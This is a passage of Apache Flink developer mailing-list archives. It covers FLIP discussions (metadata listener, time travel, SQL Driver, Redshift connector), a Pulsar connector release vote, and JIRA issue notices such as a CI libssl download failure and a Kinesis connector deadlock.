> > specific operations executed first?  If I want to perform DDL permission
> > verification(such as integrating with Ranger based on the listener) , is
> > that possible?
> >
> > The listener will be notified to report catalog modification after DDLs
> are
> > successful, so you can not do permission verification for DDL in the
> > listener. As mentioned above, Flink will not roll back the DDL even when
> > the listener throws an exception. I think permission verification is
> > another issue and can be discussed separately.
> >
> >
> > Best,
> > Shammon FY
> >
> > On Tue, May 30, 2023 at 1:07 AM Feng Jin  wrote:
> >
> > > Hi, Shammon
> > >
> > > Thanks for driving this Flip, [Support Customized Job Meta Data
> Listener]
> > > will  make it easier for Flink to collect lineage information.
> > > I fully agree with the overall solution and have a small question:
> > >
> > > 1. Will an exception thrown by the listener affect the normal execution
> > > process?
> > >
> > > 2. What is the order of execution? Is the listener executed first or
> are
> > > specific operations executed first?  If I want to perform DDL
> permission
> > > verification(such as integrating with Ranger based on the listener) ,
> is
> > > that possible?
> > >
> > >
> > > Best,
> > > Feng
> > >
> > > On Fri, May 26, 2023 at 4:09 PM Shammon FY  wrote:
> > >
> > > > Hi devs,
> > > >
> > > > We would like to bring up a discussion about FLIP-294: Support
> > Customized
> > > > Job Meta Data Listener[1]. We have had several discussions with Jark
> > Wu,
> > > > Leonard Xu, Dong Lin, Qingsheng Ren and Poorvank about the functions
> > and
> > > > interfaces, and thanks for their valuable advice.
> > > > The overall job and connector information is divided into metadata
> and
> > > > lineage, this FLIP focuses on metadata and lineage will be discussed
> in
> > > > another FLIP in the 

Re: [VOTE] Release flink-connector-pulsar 3.0.1, release candidate #1

2023-05-31 Thread Jing Ge
+1(non-binding)

- verified sign
- verified hash
- checked repos
- checked tag. NIT: the tag link should be:
https://github.com/apache/flink-connector-pulsar/releases/tag/v3.0.1-rc1
- reviewed PR. NIT: left a comment.

Best regards,
Jing

On Wed, May 31, 2023 at 11:16 PM Neng Lu  wrote:

> +1
>
> I verified
>
> + the release now can communicate with Pulsar using OAuth2 auth plugin
> + build from source and run unit tests with JDK 17 on macOS M1Max
>
>
> On Wed, May 31, 2023 at 4:24 AM Zili Chen  wrote:
>
> > +1
> >
> > I verified
> >
> > + LICENSE and NOTICE present
> > + Checksum and GPG sign matches
> > + No unexpected binaries in the source release
> > + Build from source and run unit tests with JDK 17 on macOS M1
> >
> > On 2023/05/25 16:18:51 Leonard Xu wrote:
> > > Hey all,
> > >
> > > Please review and vote on the release candidate #1 for the version
> 3.0.1
> > of the
> > > Apache Flink Pulsar Connector as follows:
> > >
> > > [ ] +1, Approve the release
> > > [ ] -1, Do not approve the release (please provide specific comments)
> > >
> > > The complete staging area is available for your review, which includes:
> > > JIRA release notes [1],
> > > The official Apache source release to be deployed to dist.apache.org
> > [2], which are signed with the key with
> > fingerprint5B2F6608732389AEB67331F5B197E1F1108998AD [3],
> > > All artifacts to be deployed to the Maven Central Repository [4],
> > > Source code tag v3.0.1-rc1 [5],
> > > Website pull request listing the new release [6].
> > > The vote will be open for at least 72 hours. It is adopted by majority
> > approval, with at least 3 PMC affirmative votes.
> > >
> > >
> > > Best,
> > > Leonard
> > >
> > > [1]
> >
> https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12315522=12352640
> > > [2]
> >
> https://dist.apache.org/repos/dist/dev/flink/flink-connector-pulsar-3.0.1-rc1/
> > > [3] https://dist.apache.org/repos/dist/release/flink/KEYS
> > > [4]
> > https://repository.apache.org/content/repositories/orgapacheflink-1641/
> > > [5] https://github.com/apache/flink-connector-pulsar/tree/v3.0.1-rc1
> > > [6] https://github.com/apache/flink-web/pull/655
> > >
> > >
> >
>


Re: [DISCUSS] FLIP-308: Support Time Travel In Batch Mode

2023-05-31 Thread Jing Ge
Hi Feng,

Thanks for the proposal! Very interesting feature. Would you like to update
your thoughts described in your previous email about why SupportsTimeTravel
has been rejected into the FLIP? This will help readers understand the
context (in the future).

Since we always directly add overload methods into Catalog according to new
requirements, which makes the interface bloated. Just out of curiosity,
does it make sense to introduce some DSL design? Like
Catalog.getTable(tablePath).on(timeStamp),
Catalog.getTable(tablePath).current() for the most current version, and
more room for further extension like timestamp range, etc. I haven't read
all the source code yet and I'm not sure if it is possible. But a
design like this will keep the Catalog API lean and the API/DSL will be
self described and easier to use.

Best regards,
Jing


On Wed, May 31, 2023 at 12:08 PM Krzysztof Chmielewski <
krzysiek.chmielew...@gmail.com> wrote:

> Ok after second though I'm retracting my previous statement about Catalog
> changes you proposed.
> I do see a benefit for Delta connector actually with this change and see
> why this could be coupled with Catalog.
>
> Delta Connector SQL support, also ships a Delta Catalog implementation for
> Flink.
> For Delta Catalog, table schema information is fetched from underlying
> _delta_log and not stored in metastore. For time travel we actually had a
> problem, that if we would like to timetravel back to some old version,
> where schema was slightly different, then we would have a conflict since
> Catalog would return current schema and not how it was for version X.
>
> With your change, our Delta Catalog can actually fetch schema for version X
> and send it to DeltaTableFactory. Currency, Catalog can fetch only current
> version. What we would also need however is version (number/timestamp) for
> this table passed to DynamicTableFactory so we could properly set Delta
> standalone library.
>
> Regards,
> Krzysztof
>
> śr., 31 maj 2023 o 10:37 Krzysztof Chmielewski <
> krzysiek.chmielew...@gmail.com> napisał(a):
>
> > Hi,
> > happy to see such a feature.
> > Small note from my end regarding Catalog changes.
> >
> > TL;DR
> > I don't think it is necessary to delegate this feature to the catalog. I
> > think that since "timetravel" is per job/query property, its should not
> be
> > coupled with the Catalog or table definition. In my opinion this is
> > something that DynamicTableFactory only has to know about. I would rather
> > see this feature as it is - SQL syntax enhancement but delegate clearly
> to
> > DynamicTableFactory.
> >
> > I've implemented timetravel feature for Delta Connector  [1]  using
> > current Flink API.
> > Docs are pending code review, but you can find them here [2] and examples
> > are available here [3]
> >
> > The timetravel feature that I've implemented is based on Flink Query
> > hints.
> > "SELECT * FROM sourceTable /*+ OPTIONS('versionAsOf' = '1') */"
> >
> > The " versionAsOf" (we also have 'timestampAsOf') parameter is handled
> not
> > by Catalog but by DyntamicTableFactory implementation for Delta
> connector.
> > The value of this property is passed to Delta standalone lib API that
> > returns table view for given version.
> >
> > I'm not sure how/if proposed change could benefit Delta connector
> > implementation for this feature.
> >
> > Thanks,
> > Krzysztof
> >
> > [1]
> >
> https://github.com/delta-io/connectors/tree/flink_table_catalog_feature_branch/flink
> > [2] https://github.com/kristoffSC/connectors/tree/FlinkSQL_PR_15-docs
> > [3]
> >
> https://github.com/delta-io/connectors/tree/flink_table_catalog_feature_branch/examples/flink-example/src/main/java/org/example/sql
> >
> > śr., 31 maj 2023 o 06:03 liu ron  napisał(a):
> >
> >> Hi, Feng
> >>
> >> Thanks for driving this FLIP, Time travel is very useful for Flink
> >> integrate with data lake system. I have one question why the
> >> implementation
> >> of TimeTravel is delegated to Catalog? Assuming that we use Flink to
> query
> >> Hudi table with the time travel syntax, but we don't use the
> HudiCatalog,
> >> instead, we register the hudi table to InMemoryCatalog,  can we support
> >> time travel for Hudi table in this case?
> >> In contrast, I think time travel should bind to connector instead of
> >> Catalog, so the rejected alternative should be considered.
> >>
> >> Best,
> >> Ron
> >>
> >> yuxia  于2023年5月30日周二 09:40写道:
> >>
> >> > Hi, Feng.
> >> > Notice this FLIP only support batch mode for time travel.  Would it
> also
> >> > make sense to support stream mode to a read a snapshot of the table
> as a
> >> > bounded stream?
> >> >
> >> > Best regards,
> >> > Yuxia
> >> >
> >> > - 原始邮件 -
> >> > 发件人: "Benchao Li" 
> >> > 收件人: "dev" 
> >> > 发送时间: 星期一, 2023年 5 月 29日 下午 6:04:53
> >> > 主题: Re: [DISCUSS] FLIP-308: Support Time Travel In Batch Mode
> >> >
> >> > # Can Calcite support this syntax ` VERSION AS OF`  ?
> >> >
> >> > This also depends on whether this is defined in 

Re: [VOTE] Release flink-connector-pulsar 3.0.1, release candidate #1

2023-05-31 Thread Neng Lu
+1

I verified

+ the release now can communicate with Pulsar using OAuth2 auth plugin
+ build from source and run unit tests with JDK 17 on macOS M1Max


On Wed, May 31, 2023 at 4:24 AM Zili Chen  wrote:

> +1
>
> I verified
>
> + LICENSE and NOTICE present
> + Checksum and GPG sign matches
> + No unexpected binaries in the source release
> + Build from source and run unit tests with JDK 17 on macOS M1
>
> On 2023/05/25 16:18:51 Leonard Xu wrote:
> > Hey all,
> >
> > Please review and vote on the release candidate #1 for the version 3.0.1
> of the
> > Apache Flink Pulsar Connector as follows:
> >
> > [ ] +1, Approve the release
> > [ ] -1, Do not approve the release (please provide specific comments)
> >
> > The complete staging area is available for your review, which includes:
> > JIRA release notes [1],
> > The official Apache source release to be deployed to dist.apache.org
> [2], which are signed with the key with
> fingerprint5B2F6608732389AEB67331F5B197E1F1108998AD [3],
> > All artifacts to be deployed to the Maven Central Repository [4],
> > Source code tag v3.0.1-rc1 [5],
> > Website pull request listing the new release [6].
> > The vote will be open for at least 72 hours. It is adopted by majority
> approval, with at least 3 PMC affirmative votes.
> >
> >
> > Best,
> > Leonard
> >
> > [1]
> https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12315522=12352640
> > [2]
> https://dist.apache.org/repos/dist/dev/flink/flink-connector-pulsar-3.0.1-rc1/
> > [3] https://dist.apache.org/repos/dist/release/flink/KEYS
> > [4]
> https://repository.apache.org/content/repositories/orgapacheflink-1641/
> > [5] https://github.com/apache/flink-connector-pulsar/tree/v3.0.1-rc1
> > [6] https://github.com/apache/flink-web/pull/655
> >
> >
>


Re: [VOTE] Release flink-connector-pulsar 3.0.1, release candidate #1

2023-05-31 Thread Neng Lu
+1

I verified this release can communicate with pulsar using Oauth2 authentication.

On 2023/05/25 16:18:51 Leonard Xu wrote:
> Hey all,
> 
> Please review and vote on the release candidate #1 for the version 3.0.1 of 
> the
> Apache Flink Pulsar Connector as follows:
> 
> [ ] +1, Approve the release
> [ ] -1, Do not approve the release (please provide specific comments)
> 
> The complete staging area is available for your review, which includes:
> JIRA release notes [1],
> The official Apache source release to be deployed to dist.apache.org [2], 
> which are signed with the key with 
> fingerprint5B2F6608732389AEB67331F5B197E1F1108998AD [3],
> All artifacts to be deployed to the Maven Central Repository [4],
> Source code tag v3.0.1-rc1 [5],
> Website pull request listing the new release [6].
> The vote will be open for at least 72 hours. It is adopted by majority 
> approval, with at least 3 PMC affirmative votes.
> 
> 
> Best,
> Leonard
> 
> [1] 
> https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12315522=12352640
> [2] 
> https://dist.apache.org/repos/dist/dev/flink/flink-connector-pulsar-3.0.1-rc1/
> [3] https://dist.apache.org/repos/dist/release/flink/KEYS
> [4] https://repository.apache.org/content/repositories/orgapacheflink-1641/
> [5] https://github.com/apache/flink-connector-pulsar/tree/v3.0.1-rc1
> [6] https://github.com/apache/flink-web/pull/655
> 
> 


[jira] [Created] (FLINK-32231) libssl not found when running CI

2023-05-31 Thread Sergey Nuyanzin (Jira)
Sergey Nuyanzin created FLINK-32231:
---

 Summary: libssl not found when running CI
 Key: FLINK-32231
 URL: https://issues.apache.org/jira/browse/FLINK-32231
 Project: Flink
  Issue Type: Bug
  Components: Build System / CI
Affects Versions: 1.18.0, 1.16.3, 1.17.2
Reporter: Sergey Nuyanzin


{noformat}
--2023-05-31 19:10:13--  
http://security.ubuntu.com/ubuntu/pool/main/o/openssl1.0/libssl1.0.0_1.0.2n-1ubuntu5.12_amd64.deb
Resolving security.ubuntu.com (security.ubuntu.com)... 185.125.190.39, 
91.189.91.38, 91.189.91.39, ...
Connecting to security.ubuntu.com (security.ubuntu.com)|185.125.190.39|:80... 
connected.
HTTP request sent, awaiting response... 404 Not Found
2023-05-31 19:10:13 ERROR 404: Not Found.

{noformat}
e.g.
https://dev.azure.com/apache-flink/apache-flink/_build/results?buildId=49523=logs=bea52777-eaf8-5663-8482-18fbc3630e81=d6e79740-7cf7-5407-2e69-ca34c9be0efb=265



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


A few questions regarding Docker

2023-05-31 Thread Amir Hossein Sharifzadeh
Hi Flink Dev Team,

I am trying to create a Docker image. Before asking my question, I will
explain to you about my application. My main (command) jar file:
1) Has dependencies on other jar files (they are all in the same directory)

2) It Needs to read some arguments from a config file.

3) Generates an output file.Is dealing with EmbeddedRocksDBStateBackend.

4) Is NOT doing anything with SQL Client.

I am following docker documentation here

and will need to create a Dockerfile and a docker-compose.yml

Question 1:
>From docker-compose.yml, in the command section, what arguments should I
pass?
(I run the standalone application from the terminal:
java -Xms10g -Xmx28g -jar my-stream-processing-1.2.jar --config
stream.config

Question 2:
Where to upload other jar dependencies?

Thank you very much.

Best,
Amir


Re: [DISCUSS] FLIP-316: Introduce SQL Driver

2023-05-31 Thread Paul Lam
Hi Biao,

Thanks for your comments!

> 1. Scope: is this FLIP only targeted for non-interactive Flink SQL jobs in
> Application mode? More specifically, if we use SQL client/gateway to
> execute some interactive SQLs like a SELECT query, can we ask flink to use
> Application mode to execute those queries after this FLIP?

Thanks for pointing it out. I think only DMLs would be executed via SQL Driver. 
I'll add the scope to the FLIP.

> 2. Deployment: I believe in YARN mode, the implementation is trivial as we
> can ship files via YARN's tool easily but for K8s, things can be more
> complicated as Shengkai said.


Your input is very informative. I’m thinking about using web submission,
but it requires exposing the JobManager port which could also be a problem
on K8s.

Another approach is to explicitly require a distributed storage to ship files,
but we may need a new deployment executor for that.

What do you think of these two approaches?

> 3. Serialization of SessionState: in SessionState, there are some
> unserializable fields
> like org.apache.flink.table.resource.ResourceManager#userClassLoader. It
> may be worthwhile to add more details about the serialization part.

I agree. That’s a missing part. But if we use ExecNodeGraph as Shengkai
mentioned, do we eliminate the need for serialization of SessionState?

Best,
Paul Lam

> 2023年5月31日 13:07,Biao Geng  写道:
> 
> Thanks Paul for the proposal!I believe it would be very useful for flink
> users.
> After reading the FLIP, I have some questions:
> 1. Scope: is this FLIP only targeted for non-interactive Flink SQL jobs in
> Application mode? More specifically, if we use SQL client/gateway to
> execute some interactive SQLs like a SELECT query, can we ask flink to use
> Application mode to execute those queries after this FLIP?
> 2. Deployment: I believe in YARN mode, the implementation is trivial as we
> can ship files via YARN's tool easily but for K8s, things can be more
> complicated as Shengkai said. I have implemented a simple POC
> 
> based on SQL client before(i.e. consider the SQL client which supports
> executing a SQL file as the SQL driver in this FLIP). One problem I have
> met is how do we ship SQL files ( or Job Graph) to the k8s side. Without
> such support, users have to modify the initContainer or rebuild a new K8s
> image every time to fetch the SQL file. Like the flink k8s operator, one
> workaround is to utilize the flink config(transforming the SQL file to a
> escaped string like Weihua mentioned) which will be converted to a
> ConfigMap but K8s has size limit of ConfigMaps(no larger than 1MB
> ). Not sure
> if we have better solutions.
> 3. Serialization of SessionState: in SessionState, there are some
> unserializable fields
> like org.apache.flink.table.resource.ResourceManager#userClassLoader. It
> may be worthwhile to add more details about the serialization part.
> 
> Best,
> Biao Geng
> 
> Paul Lam  于2023年5月31日周三 11:49写道:
> 
>> Hi Weihua,
>> 
>> Thanks a lot for your input! Please see my comments inline.
>> 
>>> - Is SQLRunner the better name? We use this to run a SQL Job. (Not
>> strong,
>>> the SQLDriver is fine for me)
>> 
>> I’ve thought about SQL Runner but picked SQL Driver for the following
>> reasons FYI:
>> 
>> 1. I have a PythonDriver doing the same job for PyFlink [1]
>> 2. Flink program's main class is sort of like Driver in JDBC which
>> translates SQLs into
>>databases specific languages.
>> 
>> In general, I’m +1 for SQL Driver and +0 for SQL Runner.
>> 
>>> - Could we run SQL jobs using SQL in strings? Otherwise, we need to
>> prepare
>>> a SQL file in an image for Kubernetes application mode, which may be a
>> bit
>>> cumbersome.
>> 
>> Do you mean a pass the SQL string a configuration or a program argument?
>> 
>> I thought it might be convenient for testing propose, but not recommended
>> for production,
>> cause Flink SQLs could be complicated and involves lots of characters that
>> need to escape.
>> 
>> WDYT?
>> 
>>> - I noticed that we don't specify the SQLDriver jar in the
>> "run-application"
>>> command. Does that mean we need to perform automatic detection in Flink?
>> 
>> Yes! It’s like running a PyFlink job with the following command:
>> 
>> ```
>> ./bin/flink run \
>>  --pyModule table.word_count \
>>  --pyFiles examples/python/table
>> ```
>> 
>> The CLI determines if it’s a SQL job, if yes apply the SQL Driver
>> automatically.
>> 
>> 
>> [1]
>> https://github.com/apache/flink/blob/master/flink-python/src/main/java/org/apache/flink/client/python/PythonDriver.java
>> 
>> Best,
>> Paul Lam
>> 
>>> 2023年5月30日 21:56,Weihua Hu  写道:
>>> 
>>> Thanks Paul for the proposal.
>>> 
>>> +1 for this. It is valuable in improving ease of use.
>>> 
>>> I have a few questions.
>>> - Is SQLRunner the better name? We use this to run a SQL Job. (Not
>> strong,

[jira] [Created] (FLINK-32230) Deadlock in AWS Kinesis Data Streams connector

2023-05-31 Thread Antonio Vespoli (Jira)
Antonio Vespoli created FLINK-32230:
---

 Summary: Deadlock in AWS Kinesis Data Streams connector
 Key: FLINK-32230
 URL: https://issues.apache.org/jira/browse/FLINK-32230
 Project: Flink
  Issue Type: Bug
  Components: Connectors / AWS
Affects Versions: 1.17.1, 1.16.2, 1.15.4
Reporter: Antonio Vespoli
 Fix For: aws-connector-3.1.0, aws-connector-4.2.0


Connector calls to AWS Kinesis Data Streams can hang indefinitely without 
making any progress.

We suspect the root cause to be related to the SDK handling of exceptions, 
similarly to what observed in FLINK-31675.

We identified this deadlock on applications running on AWS Kinesis Data 
Analytics using the AWS Kinesis Data Streams connectors (with AWS SDK version 
2.20.32 as per FLINK-31675). The deadlock scenario is still the same as 
described in FLINK-31675. However, the Netty content-length exception does not 
appear when using the updated SDK version.

This issue only occurs for applications and streams in the AWS regions 
_ap-northeast-3_ and {_}us-gov-east-1{_}. We did not observe this issue in any 
other AWS region.

The issue happens sporadically and unpredictably. As per its nature, we do not 
have instructions for reproducing it.

Example of flame-graphs observed when the issue occurs:


{code:java}
root
java.lang.Thread.run:829
org.apache.flink.runtime.taskmanager.Task.run:568
org.apache.flink.runtime.taskmanager.Task.doRun:746
org.apache.flink.runtime.taskmanager.Task.restoreAndInvoke:932
org.apache.flink.runtime.taskmanager.Task.runWithSystemExitMonitoring:953
org.apache.flink.runtime.taskmanager.Task$$Lambda$1253/0x000800ecbc40.run:-1
org.apache.flink.streaming.runtime.tasks.StreamTask.invoke:753
org.apache.flink.streaming.runtime.tasks.StreamTask.runMailboxLoop:804
org.apache.flink.streaming.runtime.tasks.mailbox.MailboxProcessor.runMailboxLoop:203
org.apache.flink.streaming.runtime.tasks.StreamTask$$Lambda$907/0x000800bf7840.runDefaultAction:-1
org.apache.flink.streaming.runtime.tasks.StreamTask.processInput:519
org.apache.flink.streaming.runtime.io.StreamOneInputProcessor.processInput:65
org.apache.flink.streaming.runtime.io.AbstractStreamTaskNetworkInput.emitNext:110
org.apache.flink.streaming.runtime.io.checkpointing.CheckpointedInputGate.pollNext:159
org.apache.flink.streaming.runtime.io.checkpointing.CheckpointedInputGate.handleEvent:181
org.apache.flink.streaming.runtime.io.checkpointing.SingleCheckpointBarrierHandler.processBarrier:231
org.apache.flink.streaming.runtime.io.checkpointing.SingleCheckpointBarrierHandler.markCheckpointAlignedAndTransformState:262
org.apache.flink.streaming.runtime.io.checkpointing.SingleCheckpointBarrierHandler$$Lambda$1586/0x0008012c5c40.apply:-1
org.apache.flink.streaming.runtime.io.checkpointing.SingleCheckpointBarrierHandler.lambda$processBarrier$2:234
org.apache.flink.streaming.runtime.io.checkpointing.AbstractAlignedBarrierHandlerState.barrierReceived:66
org.apache.flink.streaming.runtime.io.checkpointing.AbstractAlignedBarrierHandlerState.triggerGlobalCheckpoint:74
org.apache.flink.streaming.runtime.io.checkpointing.SingleCheckpointBarrierHandler$ControllerImpl.triggerGlobalCheckpoint:493
org.apache.flink.streaming.runtime.io.checkpointing.SingleCheckpointBarrierHandler.access$100:64
org.apache.flink.streaming.runtime.io.checkpointing.SingleCheckpointBarrierHandler.triggerCheckpoint:287
org.apache.flink.streaming.runtime.io.checkpointing.CheckpointBarrierHandler.notifyCheckpoint:147
org.apache.flink.streaming.runtime.tasks.StreamTask.triggerCheckpointOnBarrier:1198
org.apache.flink.streaming.runtime.tasks.StreamTask.performCheckpoint:1241
org.apache.flink.streaming.runtime.tasks.StreamTaskActionExecutor$1.runThrowing:50
org.apache.flink.streaming.runtime.tasks.StreamTask$$Lambda$1453/0x00080128e840.run:-1
org.apache.flink.streaming.runtime.tasks.StreamTask.lambda$performCheckpoint$12:1253
org.apache.flink.streaming.runtime.tasks.SubtaskCheckpointCoordinatorImpl.checkpointState:300
org.apache.flink.streaming.runtime.tasks.RegularOperatorChain.prepareSnapshotPreBarrier:89
org.apache.flink.streaming.runtime.operators.sink.SinkWriterOperator.prepareSnapshotPreBarrier:165
org.apache.flink.connector.base.sink.writer.AsyncSinkWriter.flush:494
org.apache.flink.connector.base.sink.writer.AsyncSinkWriter.yieldIfThereExistsInFlightRequests:503
org.apache.flink.streaming.runtime.tasks.mailbox.MailboxExecutorImpl.yield:84
org.apache.flink.streaming.runtime.tasks.mailbox.TaskMailboxImpl.take:149
java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.await:2211
java.util.concurrent.locks.LockSupport.parkNanos:234
jdk.internal.misc.Unsafe.park:-2 {code}
 



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (FLINK-32229) Implement metrics and logging for Initial implementation

2023-05-31 Thread Hong Liang Teoh (Jira)
Hong Liang Teoh created FLINK-32229:
---

 Summary: Implement metrics and logging for Initial implementation
 Key: FLINK-32229
 URL: https://issues.apache.org/jira/browse/FLINK-32229
 Project: Flink
  Issue Type: Sub-task
Reporter: Hong Liang Teoh


Add/Ensure Kinesis specific metrics for MillisBehindLatest/numRecordsIn are 
published.

List is here: 
https://cwiki.apache.org/confluence/display/FLINK/FLIP-33%3A+Standardize+Connector+Metrics



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (FLINK-32228) Bump testcontainers

2023-05-31 Thread Jira
João Boto created FLINK-32228:
-

 Summary: Bump testcontainers
 Key: FLINK-32228
 URL: https://issues.apache.org/jira/browse/FLINK-32228
 Project: Flink
  Issue Type: Improvement
  Components: Connectors / JDBC
Reporter: João Boto


Bump testcontainers version



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (FLINK-32227) Correct some grammar errors and optimize some code styles

2023-05-31 Thread zhihao song (Jira)
zhihao song created FLINK-32227:
---

 Summary: Correct some grammar errors and optimize some code styles
 Key: FLINK-32227
 URL: https://issues.apache.org/jira/browse/FLINK-32227
 Project: Flink
  Issue Type: Improvement
  Components: Runtime / Checkpointing
Reporter: zhihao song


When I was reading the latest version of Flink's Checkpoint logic, I found and 
corrected some syntax errors in the comments.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (FLINK-32226) RestClusterClient leaks jobgraph file if submission fails

2023-05-31 Thread Chesnay Schepler (Jira)
Chesnay Schepler created FLINK-32226:


 Summary: RestClusterClient leaks jobgraph file if submission fails
 Key: FLINK-32226
 URL: https://issues.apache.org/jira/browse/FLINK-32226
 Project: Flink
  Issue Type: Bug
  Components: Client / Job Submission
Affects Versions: 1.17.0
Reporter: Chesnay Schepler
Assignee: Chesnay Schepler
 Fix For: 1.18.0, 1.17.2


{code:java}
submissionFuture
.thenCompose(ignored -> jobGraphFileFuture)
.thenAccept(
jobGraphFile -> {
try {
Files.delete(jobGraphFile);
} catch (IOException e) {
LOG.warn("Could not delete temporary file {}.", 
jobGraphFile, e);
}
});
{code}




--
This message was sent by Atlassian Jira
(v8.20.10#820010)


Re: [VOTE] Release flink-connector-pulsar 3.0.1, release candidate #1

2023-05-31 Thread Zili Chen
+1

I verified

+ LICENSE and NOTICE present
+ Checksum and GPG sign matches
+ No unexpected binaries in the source release
+ Build from source and run unit tests with JDK 17 on macOS M1

On 2023/05/25 16:18:51 Leonard Xu wrote:
> Hey all,
> 
> Please review and vote on the release candidate #1 for the version 3.0.1 of 
> the
> Apache Flink Pulsar Connector as follows:
> 
> [ ] +1, Approve the release
> [ ] -1, Do not approve the release (please provide specific comments)
> 
> The complete staging area is available for your review, which includes:
> JIRA release notes [1],
> The official Apache source release to be deployed to dist.apache.org [2], 
> which are signed with the key with 
> fingerprint5B2F6608732389AEB67331F5B197E1F1108998AD [3],
> All artifacts to be deployed to the Maven Central Repository [4],
> Source code tag v3.0.1-rc1 [5],
> Website pull request listing the new release [6].
> The vote will be open for at least 72 hours. It is adopted by majority 
> approval, with at least 3 PMC affirmative votes.
> 
> 
> Best,
> Leonard
> 
> [1] 
> https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12315522=12352640
> [2] 
> https://dist.apache.org/repos/dist/dev/flink/flink-connector-pulsar-3.0.1-rc1/
> [3] https://dist.apache.org/repos/dist/release/flink/KEYS
> [4] https://repository.apache.org/content/repositories/orgapacheflink-1641/
> [5] https://github.com/apache/flink-connector-pulsar/tree/v3.0.1-rc1
> [6] https://github.com/apache/flink-web/pull/655
> 
> 


[jira] [Created] (FLINK-32225) merge task deployment related fields into a new configuration

2023-05-31 Thread Weihua Hu (Jira)
Weihua Hu created FLINK-32225:
-

 Summary: merge task deployment related fields into a new 
configuration 
 Key: FLINK-32225
 URL: https://issues.apache.org/jira/browse/FLINK-32225
 Project: Flink
  Issue Type: Technical Debt
  Components: Runtime / Coordination
Reporter: Weihua Hu
 Fix For: 1.18.0


As discussed in https://github.com/apache/flink/pull/22674

TaskDeploymentDescriptorFactory#fromExecution needs to retrieve several fields 
from the ExecutionGraphAccessor.  We could introduce a new 
TaskDeploymentDescriptorConfiguration to merge all these fields to make the 
EG/TaskDeploymentDescriptor more readable.




--
This message was sent by Atlassian Jira
(v8.20.10#820010)


Re: [DISCUSS] FLIP-307: Flink connector Redshift

2023-05-31 Thread Samrat Deb
Hi Liu Ron,

> 1. Regarding the  `read.mode` and `write.mode`, you say here provides two
modes, respectively, jdbc and `unload or copy`, What is the default value
for `read.mode` and `write.mode?

I have made an effort to make the configuration options `read.mode` and
`write.mode` mandatory for the "flink-connector-redshift" according to
FLIP[1]. The rationale behind this decision is to empower users who are
familiar with their Redshift setup and have specific expectations for the
sink. By making these configurations mandatory, users can have more control
and flexibility in configuring the connector to meet their requirements.

However, I am open to receiving feedback on whether it would be beneficial
to make the configuration options non-mandatory and set default values for
them. If you believe there are advantages to having default values or any
other suggestions, please share your thoughts. Your feedback is highly
appreciated.

>  2. For Source, does it both support batch read and streaming read?

Redshift currently does not provide native support for streaming reads,
although it does support streaming writes[2]. As part of the plan, I intend
to conduct a proof of concept and benchmarking to explore the possibilities
of implementing streaming reads using the Flink JDBC connector, as Redshift
is JDBC compatible.
However, it is important to note that, in the initial phase of
implementation, the focus will primarily be on supporting batch reads
rather than streaming reads. This approach will allow us to deliver a
robust and reliable solution for batch processing in phase 2 of the
implementation.

[1]
https://cwiki.apache.org/confluence/display/FLINK/FLIP-307%3A++Flink+Connector+Redshift
[2]
https://docs.aws.amazon.com/redshift/latest/dg/materialized-view-streaming-ingestion.html

Bests,
Samrat

On Wed, May 31, 2023 at 8:03 AM liu ron  wrote:

> Hi, Samrat
>
> Thanks for driving this FLIP. It looks like supporting
> flink-connector-redshift is very useful to Flink. I have two question:
> 1. Regarding the  `read.mode` and `write.mode`, you say here provides two
> modes, respectively, jdbc and `unload or copy`, What is the default value
> for `read.mode` and `write.mode?
> 2. For Source, does it both support batch read and streaming read?
>
>
> Best,
> Ron
>
> Samrat Deb  于2023年5月30日周二 17:15写道:
>
> > [1]
> >
> >
> https://cwiki.apache.org/confluence/display/FLINK/FLIP-307%3A++Flink+Connector+Redshift
> >
> > [note] Missed the trailing link for previous mail
> >
> >
> >
> > On Tue, May 30, 2023 at 2:43 PM Samrat Deb 
> wrote:
> >
> > > Hi Leonard,
> > >
> > > > and I’m glad to help review the design as well as the code review.
> > > Thank you so much. It would be really great and helpful to bring
> > > flink-connector-redshift for flink users :) .
> > >
> > > I have divided the implementation in 3 phases in the `Scope`
> Section[1].
> > > 1st phase is to
> > >
> > >- Integrate with Flink Sink API (*FLIP-171*
> > ><
> > https://cwiki.apache.org/confluence/display/FLINK/FLIP-171%3A+Async+Sink
> >
> > >)
> > >
> > >
> > > > About the implementation phases, How about prioritizing support for
> the
> > > Datastream Sink API and TableSink API in the first phase?
> > > I can completely resonate with you to prioritize support for Datastream
> > > Sink API and TableSink API in the first phase.
> > > I will update the FLIP[1] as you have suggested.
> > >
> > > > It seems that the primary use cases for the Redshift connector are
> > > acting as a sink for processed data by Flink.
> > > Yes, majority ask and requirement for Redshift connector is sink for
> > > processed data by Flink.
> > >
> > > Bests,
> > > Samrat
> > >
> > > On Tue, May 30, 2023 at 12:35 PM Leonard Xu  wrote:
> > >
> > >> Thanks @Samrat for bringing this discussion.
> > >>
> > >> It makes sense to me to introduce AWS Redshift connector for Apache
> > >> Flink, and I’m glad to help review the design as well as the code
> > review.
> > >>
> > >> About the implementation phases, How about prioritizing support for
> the
> > >> Datastream Sink API and TableSink API in the first phase? It seems
> that
> > the
> > >> primary use cases for the Redshift connector are acting as a sink for
> > >> processed data by Flink.
> > >>
> > >> Best,
> > >> Leonard
> > >>
> > >>
> > >> > On May 29, 2023, at 12:51 PM, Samrat Deb 
> > wrote:
> > >> >
> > >> > Hello all ,
> > >> >
> > >> > Context:
> > >> > Amazon Redshift [1] is a fully managed, petabyte-scale data
> warehouse
> > >> > service in the cloud. It allows analyzing data without all of the
> > >> > configurations of a provisioned data warehouse. Resources are
> > >> automatically
> > >> > provisioned and data warehouse capacity is intelligently scaled to
> > >> deliver
> > >> > fast performance for even the most demanding and unpredictable
> > >> workloads.
> > >> > Redshift is one of the widely used warehouse solutions in the
> current
> > >> > market.
> > >> >
> > >> > Building flink connector 

Re: [DISCUSS] FLIP-308: Support Time Travel In Batch Mode

2023-05-31 Thread Krzysztof Chmielewski
Ok after second though I'm retracting my previous statement about Catalog
changes you proposed.
